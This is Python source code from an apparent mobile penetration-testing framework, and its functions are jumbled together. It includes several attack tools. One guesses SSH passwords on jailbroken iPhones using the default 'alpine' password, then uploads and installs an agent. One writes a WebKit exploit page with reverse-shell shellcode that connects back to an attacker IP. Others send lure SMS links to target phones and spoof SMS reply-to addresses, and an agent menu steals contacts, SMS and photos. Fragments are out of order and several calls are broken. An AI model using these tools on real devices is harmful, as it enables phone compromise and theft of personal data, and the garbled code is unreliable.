def guess_pass(passfile='', default=False, agent_location='./'):
# Init Default Vars
ipaddress = raw_input(color(33, '[*] IP address: '))
vulnerable = 'no'
agent = 'no'
command = 'sftp root@%s' % ipaddress
timeout = 10
notfound = 'ssh: connect to host %s port 22: Connection refused' % ipaddress
passwordstring = "root@%s's password: " % ipaddress
putfile = agent_location
agentfile = putfile.split('/')[-1]
connectstring = 'Connecting to %s...' % ipaddress
installcommand = 'dpkg -i %s' % agentfile
guesspassword = ''
passlist = ['alpine']
# Read passwords from file if not using default password
if default == False:
passfile = raw_input(color(33, '[*] Password File Location: '))
file = open(passfile, 'r')
passlist = file.readlines()
for guess in passlist:
# Try to spawn an sftp session
try:
exp = pexpect.spawn(command)
except Exception, e:
print color(31, '[!] Cannot spawn sftp command: %s' % e)
return 1
try:
exp.expect(connectstring, timeout)
exp.expect('Are you sure you want to continue connecting (yes/no)?', timeout)
exp.sendline('yes')
exp.expect(passwordstring,timeout)
exp.sendline(guess)
# If the sftp works, we know that the password was correct
try:
exp.expect('sftp>', timeout)
vulnerable = 'yes'
break
except Exception, e:
vulnerable = 'no'
pass
except Exception, e:
# print '[!] Exception: %s' % e
if str(e).__contains__('Connection refused') == True:
print color(31, '[!] Exception: Connection Refused')
if default == False:
return 1
else:
print color(31, '[!] Exception: %s' % e)
def spf_db():
'''Wrapper for MySQLdb.connect, rereads SQL config vars in case
they change.'''
config = ConfigParser.ConfigParser()
config.read('config.cfg')
# SQL config vars
sqlserver = config.get('SQL','server')
username = config.get('SQL','username')
password = config.get('SQL','password')
try:
db = MySQLdb.connect(sqlserver, username, password, 'framework')
except Exception, e:
print color(31,'[!] Error connecting to database: %s' % e)
db = None
def sshguess():
print 'This module attempts to guess the password for an Jailbroken iPhone on the local network by reading from a supplied password list\n'
phoneipaddress = raw_input(color(33, '[+] IP address: '))
passfile = raw_input(color(33, '[+] Password file: '))
print color(33, '\n[*] IP Address: %s' % phoneipaddress)
print color(33, '[*] Password file: %s' % passfile)
correct = raw_input(color(31, '[+] Is this correct?(') + color(32, 'y') + color(31, '/') + color(32, 'N') + color(31, '): '))
if correct.lower().split('')[0] == 'y':
e = guess_pass(phoneipaddress, passfile)
return e
return 1
def agentcontrol_menu(key=None):
if key == None:
key = raw_input(color(33, '\n[-] Enter agent control key [None]: '))
try:
key = key.lower()
except:
pass
if key in ('', 'none', '\n', None):
key = None
if key == None:
print color(31, '[!] No key was provided, communicating with an agent will not work')
print color(31, '[!] Returning...')
return 1
menu_list = ['Send SMS' ,
'Take Picture' ,
'Get Contacts' ,
'Get SMS Database' ,
'Privilege Escalation'
]
choice = menu(menu_list, color(35, '\n[*] Agent Control Commands:\n'))
if choice is 0:
return_code = 0
elif choice is 1:
return_code = send_sms(key)
elif choice is 2:
return_code = take_picture(key)
elif choice is 3:
return_code = get_contacts(key)
elif choice is 4:
return_code = get_sms_database(key)
elif choice is 5:
return_code = privilege_escalation(key)
# elif choice is my_number:
# return_code = custom_module()
# etc...
else:
return_code = 1
return return_code
def database_clear():
# Clears the MySQL DB
ver = str(raw_input(str(color(31,"[!] This will destroy all your data! Are you sure you want to continue? (") + color(32,'y') + color(31, '/') + color(32,'N') + color(31,') '))))
return_code = 0
if ver == '':
ver = 'n'
if ver.lower()[0] != 'y':
print color(31,'[!] Operation Cancelled')
return_code = 0
return return_code
db = spf_db()
droplist = []
for item in ['agents', 'data', 'modems', 'remote', 'client']:
command = 'DROP TABLE IF EXISTS %s' % item
droplist.append(command)
createquery1 =("create table agents ("+
"id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"+
"number varchar(12),"+
"path varchar(1000),"+
"controlkey varchar(7),"+
"controlnumber varchar(12),"+
"platform varchar(12))")
createquery2 =("create table data ("+
"id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"+
"sms varchar(2000),"+
"contacts varchar(1000),"+
"picture varchar(100),"+
"root varchar(5))")
createquery3 =("create table modems ("+
"id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"+
"number varchar(12),"+
"path varchar(1000),"+
"controlkey varchar(7),"+
"type varchar(3))")
createquery4 =("create table remote ("+
"id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"+
"ip varchar(15),"+
"exploit varchar(200),"+
"vuln varchar(3),"+
"agent varchar(3))")
createquery5 =("create table client ("+
"id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"+
"number varchar(12),"+
"exploit varchar(200),"+
"vuln varchar(3))")
if db == None:
print str(color(31,"[!] Database doesn't exist.") + color(32,"Creating it\n"))
#makecommand = 'mysqladmin -u %s create framework -p %s' % (username, password)
try:
# system(makecommand)
# db = MySQLdb.connect(sqlserver, username, password, "framework")
return_code = 1
return return_code
except Exception, e:
print color(31,'[!] Error creating DB: %s' % e)
return_code = 1
# Return here to prevent database commands from trying to execute
return return_code
return return_code
cursor = db.cursor()
createlist = [createquery1, createquery2, createquery3, createquery4, createquery5]
try:
for item in droplist:
cursor.execute(item)
db.commit()
for item in createlist:
cursor.execute(item)
db.commit()
except Exception, e:
print color(31,'[!] Error executing clear and build commands: %s' % e)
return_code = 1
return return_code
def database_add2(number, path, key, x):
# Adds to a DB, need to figure out where this is used and clean it up
db = spf_db()
number = '"%s"' % str(number)
path = '"%s"' % str(path)
key = '"%s"' % str(key)
x = '"%s"' % str(x)
insertquery = 'INSERT INTO modems (id,number,path,controlkey,type) VALUES (DEFAULT,%s,%s,%s,%s)' % (number, path, key, x)
def client_side():
# TODO: fix a lot
webserver = config.get("Web", "server")
# ipaddress = config.get('Web', 'ipaddress')
shellipaddress = config.get("Web", "shellipaddress")
cs = ["CVE 2010-1759 Webkit Vuln Android"]
choice = menu(cs)
if choice in (0, "Error"):
return 0
elif choice == 1:
path = str(raw_input(color(33, "[-] Hosting Path: ")))
filename = str(raw_input(color(33, "[-] Filename: ")))
ipaddress = str(raw_input(color(33, "[-] Local IP address: ")))
number = str(raw_input(color(33, "[-] Phone Number to Attack: ")))
link = "http://%s%s%s" % (ipaddress, path, filename)
fullpath = webserver + path
command1 = "mkdir %s" % fullpath
system(command1)
octets = shellipaddress.split(".")
out1 = struct.pack("b", int(octets[0]))
hex1 = hex(out1)
out2 = struct.pack("b", int(octets[1]))
hex2 = hex(out2)
out3 = struct.pack("b", int(octets[2]))
hex3 = hex(out3)
out4 = struct.pack("b", int(octets[3]))
hex4 = hex(out4)
sploitfile = "%s%s" % (fullpath, filename)
command8 = "touch %s" % sploitfile
system(command8)
command9 = "chmod 777 %s" % sploitfile
system(command9)
file = open(sploitfile, "w")
text = [
"<html>\n",
"<head>\n",
"<script>\n",
'var ip = unescape("\\u' + hex2 + hex1 + "\\u" + hex4 + hex3 + '");\n',
'var port = unescape("\\u3930");\n',
"function trigger()\n",
"{\n",
'var span = document.createElement("div");\n',
'document.getElementById("BodyID").appendChild(span);\n',
'span.innerHTML = -parseFloat("NAN(ffffe00572c60)");\n',
"}\n",
"function exploit()\n",
"{\n",
'var nop = unescape("\\u33bc\\u0057");\n',
"do\n",
"{\n",
"nop+=nop;\n",
"} while (nop.length<=0x1000);\n",
'var scode = nop+unescape("\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\n',
"scode += port;\n",
"scode += ip;\n",
'scode += unescape("\\u2000\\u2000");\n',
"target = new Array();\n",
"for(i = 0; i < 0x1000; i++)\n",
"target[i] = scode;\n",
"for (i = 0; i <= 0x1000; i++)\n",
"{\n",
'document.write(target[i]+"<i>");\n',
"if (i>0x999)\n",
"{\n",
"trigger();\n",
"}\n",
"}\n",
"}\n",
"</script>\n",
"</head>\n",
'<body id="BodyID">\n',
"Enjoy!\n",
"<script>\n",
"exploit();\n",
"</script>\n",
"</body>\n",
"</html>\n",
]
file.writelines(text)
file.close()
modem = get_modem()
if modem == 0:
print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n")
return 1
# Read SQL vars from config
sqlserver = config.get("SQL", "server")
username = config.get("SQL", "username")
password = config.get("SQL", "password")
db = MySQLdb.connect(sqlserver, username, password, "framework")
pathquery = "SELECT %s from modems where id=%s" % ("path", modem)
path2 = db_exec_rows(pathquery)
keyquery = "SELECT %s from modems where id=%s" % ("controlkey", modem)
key2 = db_exec_rows(keyquery)
modemtypequery = "SELECT %s from modems where id=%s" % ("type", modem)
modemtype2 = db_exec_rows(modemtypequery)
if modemtype2 == "usb":
# Interface with USB modem
usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
usb.write("ATZ\r\n")
sleep(1)
line = read_modem(usb)
print line
sleep(1)
usb.write("AT+CMGF=1\r\n")
line = read_modem(usb)
print line
sleep(1)
numberline = 'AT+CMGS="%s"\r\n' % number
usb.write(numberline)
line = read_modem(usb)
print line
sleep(1)
msg = "This is a cool page: %s" % link
usb.write(struct.pack("b", 26, msg))
sleep(2)
line = read_modem(usb)
print line
sleep(1)
usb.close()
elif modemtype2 == "app":
# Interface with app-based modem
control = "%s%s/getfunc" % (webserver, path2)
command2 = "%s SEND %s This is a cool page: %s" % (key2, number, link)
file = open(control, "w")
file.write(command2)
file.close()
vulnerable = "no"
# socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((str(shellipaddress), 12345))
if data_socket == socket.accept():
data = "/system/bin/id\n"
data_socket.write(data)
data = data_socket()
print data
close(data_socket)
vulnerable = "yes"
print color(32, "\n[+] Vulnerable: %s\n" % vulnerable)
table = "client"
global db
number2 = '"%s"' % number
vulnerable2 = '"%s"' % vulnerable
webkit = '"webkit"'
insertquery = "INSERT INTO %s (id,number,exploit,vuln) VALUES (DEFAULT,%s,%s,%s)" % (
table,
number2,
webkit,
vulnerable2,
)
cursor = db.cursor()
sql = cursor.execute(insertquery)
return 0
return 1
except Exception, e:
vulnerable = 'no'
pass
except Exception, e:
# print '[!] Exception: %s' % e
if str(e).__contains__('Connection refused') == True:
print color(31, '[!] Exception: Connection Refused')
if default == False:
return 1
else:
print color(31, '[!] Exception: %s' % e)
# Upload agent if vulnerable
if vulnerable == 'yes':
print color(32, '[+] PASSWORD FOUND: %s\n' % guess)
guesspassword = guess
exp.sendline('put %s' % putfile)
exp.expect('sftp>', timeout)
exp.sendline('bye')
command2 = 'ssh'
exp = pxpect.spawn(command2+param)
exp.expect(passwordstring, timeout)
exp.sendline(guess)
exp.expect(['root'])
exp.sendline(installcommand)
exp.expect('Setting up com.bulbsecurity.tooltest (0.0.1-23) ...', timeout)
exp.sendline('tooltest')
try:
def sms_sender_spoof():
print color(
33,
"[*] This module allows you to spoof the Reply-to address on an SMS using the User Data Header (UDH).\n"
+ "[ ] This attack only works against iPhones.\n"
+ "[ ] Currently this attack requires a USB mobile modem and does not work with the SPF app.\n",
)
print color(35, "[*] Select a USB modem to use for the attack:\n")
modem = get_usb_modem()
if modem is 0:
print color(31, "\nNo USB modems found. Attach a USB modem to use this functionality\n")
else:
print color(
31,
"[!] This functionality isn't perfect yet. "
+ "There is something is wrong with the fill bits on the UDH if it does not meet on a septet boundary.\n"
+ "[ ] The message will be mangled. To get it to work use a 4 digit spoofed number ie 1234 or 9999.\n",
)
numberattack = raw_input(color(33, "[+] Number to Attack: "))
message = raw_input(color(33, "[+] Message: "))
spoof = raw_input(color(33, "[+] Spoofed Reply-To Address: "))
print color(33, "\n[*] Number to Attack: ") + color(31, "%s" % numberattack)
print color(33, "[*] Message: ") + color(31, "%s" % message)
print color(33, "[*] Spoofed Reply-To Address: ") + color(31, "%s" % spoof)
correct = raw_input(
color(35, "\n[*] Is this correct?(") + color(32, "y") + color(35, "/") + color(32, "N") + color(35, "): ")
)
if correct[0].lower() is "y":
pdu = "004100"
ef = 0
length = len(numberattack)
# print $len;
if length % 2 is not 0:
ef = 1
attacklenhex = "%02x" % length
# print attacklenhex
pdu += attacklenhex
scrambledattack = ""
i = 0
x = numberattack
while i < (length - 2):
sub = x[i + 1]
scrambledattack += sub
sub = x[i]
scrambledattack += sub
i += 2
if ef is 1:
scrambledattack += "F"
sub = x[length - 1]
scrambledattack += sub
else:
sub = x[i + 1]
scrambledattack += sub
sub = x[i]
scrambledattack += sub
# print scrambledattack
pdu = "%s91%s0000" % (pdu, scrambledattack)
eff = 0
length = len(spoof)
# print "Length: %s\n" % length
if length % 2 != 0:
eff = 1
spooflenhex = "%02x" % length
# print "Spoof hex length: %s\n" % spooflenhex
scrambledspoof = ""
i = 0
x = spoof
while i < length - 2:
sub = x[i + 1]
scrambledspoof += sub
sub = x[i]
scrambledspoof += sub
i += 2
if eff is 1:
scrambledspoof += "F"
sub = x[length - 1]
scrambledspoof += sub
else:
sub = x[i + 1]
scrambledspoof += sub
sub = x[i]
scrambledspoof += sub
# print $scrambledspoof
uhd = "%s91%s" % (spooflenhex, scrambledspoof)
# print "UHD1: "+$uhd+"\n"
udhlen1 = len(uhd) / 2
# print "length1 "+$udhlen1+"\n"
uhd = "220%s%s" % (udhlen1, uhd)
# print "UHD2 "+$uhd+"\n"
udhlen2 = len(uhd) / 2
more = ((udhlen2 + 1) * 8) % 7
# print "More: "+$more
if more is not 0:
more2 = "0" * (7 - more)
# print "More2: "+$more2
else:
more2 = ""
# print "length2 "+$udhlen2+"\n"
uhdlenhex = "%02x" % udhlen2
uhd = uhdlenhex + uhd
# print "UHD:"+$uhd+"\n";
bin = ""
length = len(message)
bits = struct.unpack("B", int(message, 2))[0]
bits = more2 + bits
# print "BITS: "+bits+"\n"
bitslength = len(bits) / 2
octetlength = bitslength / 8
# print "\n"+$octetlength+"\n"
septets = ""
i = 0
while i < octetlength:
start = i * 8
octs = str(bits).split("")[start : start + 8]
sept = octs.split("")[1 : 1 + 7]
septets += sept
# print "\nSeptets: %s\n" % septets
septetlength = len(septets) / 7
# print "\nSeptet Length: %s\n" % str(septetlength)
eat = 1
eaten = 0
ud = ""
j = 0
while j < (septetlength - 1):
start = j * 7
# print "\nEaten: %s\n" % eaten
first = str(septets).split("")[start : start + (7 - eaten)]
# print "\nFirst: %s\n" % first
start2 = (j + 1) * 7
second = str(septets).split("")[start2 : start2 + 7]
food = 7 - eat
stolen = second.split("")[food : food + eat]
encode = stolen + first
# print "\nEncode: %s\n" % encode
hexy = struct.unpack("H", struct.pack("B", int(encode, 2)))
eat += 1
eat = eat % 8
eaten += 1
eaten = eaten % 8
# print "\nHexy: %s\n" % hexy
ud += hexy
j += 1
first = septets.split("")[((septetlength - 1) * 7) : ((septetlength - 1) * 7) + (7 - eaten)]
# print "\nFirst: %s\n" % first
fill = 1 + eaten
zeros = "0" * fill
encode = zeros + first
# print "\nEncode: %s\n" % encode
hexy = struct.unpack("H", struct.pack("B", int(encode, 2)))
ud += hexy
# print "\nUD: %s\n" % ud
ud = uhd + ud
udlength = len(ud)
udlength2 = udlength / 2
extra = int(udlength2 / 7)
udlength3 = udlength2 + extra
udlenhex = "%02x" % udlength3
pdu += udlenhex + ud
# print "\nPDU: %s\n" % pdu
pdulen = (len(pdu) / 2) - 1
# print "\nPDULENGTH: %s\n" % pdulen
usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
usb.write("ATZ\r\n")
sleep(1)
line = read_modem(usb)
print line
sleep(1)
usb.write("AT+CMGF=0\r\n")
line = read_modem(usb)
print line
sleep(1)
usb.write("AT+CMGS=%s\r\n" % pdulen)
# usb.write("AT+CMGS=27\r\n")
line = read_modem(usb)
print line
sleep(1)
msg = pdu
# msg = "0041000B916110831316F900000F0A22080B915117344588F142A701"
usb.write(msg.pack("b", 26))
sleep(10)
line = read_modem(usb)
print line
usb.close()
i += 1
return 0
def alpine():
print color(33,'[*] Executing the "Guess Password" module with default password')
a = guess_pass(default=True)
return a
def direct_download():
#TODO: cleanup
webserver = config.get('Web', 'server')
ipaddress = config.get('Web', 'ipaddress')
print color(35, '[*] This module sends an SMS with a link to directly download and install an Agent\n')
print color(31, '[!] ONLY Android currently Supported')
#platform = str(raw_input('Platform(Android/iPhone/Blackberry): '))
platform = 'android'
# Lots of potential for error with the way this is handled, would
# prefer safer execution
path = str(raw_input(color(33, '[-] Hosting Path: ' )))
filename = str(raw_input(color(33, '[-] Filename: ' )))
number = str(raw_input(color(33, '[-] Phone Number to Attack: ')))
if platform.lower() == 'android':
link = 'http://%s%s%s' % (ipaddress, path, filename)
fullpath = '%s%s' % (webserver, path)
command1 = 'mkdir %s' % fullpath
system(command1)
global location # Android agent location
command = 'cp %s %s%s%s'% (location, webserver, path, filename)
system(command)
modem = get_modem()
if modem == 0:
print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
return 0
else:
pathquery = "SELECT %s from modems where id=%s" % ('path', modem)
path2 = db_exec_rows(pathquery)
keyquery = "SELECT %s from modems where id=%s" % ('controlkey', modem)
key2 = db_exec_rows(keyquery)
modemtypequery = "SELECT %s from modems where id=%s" % ('type', modem)
modemtype2 = db_exec_rows(modemtypequery)
if modemtype2 == 'usb':
usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
usb.write('ATZ\r\n')
sleep(1)
line = read_modem(usb)
print line
sleep(1)
usb.write('AT+CMGF=1\r\n')
line = read_modem(usb)
print line
sleep(1)
numberline = 'AT+CMGS="%s"\r\n' % number
usb.write(numberline)
line = read_modem(usb)
print line
sleep(1)
msg = 'This is a cool app: %s' % link
usb.write(struct.pack('b', 26, msg))
sleep(5)
line = read_modem(usb)
print line
sleep(1)
usb.close()
elif modemtype2 == 'app':
control = '%s%s/getfunc' % (webserver, path2)
command2 = '%s SEND %s This is a cool app: %s' % (key2, number, link)
file = open(control, 'w')
file.write(command2)
file.close()
return 0
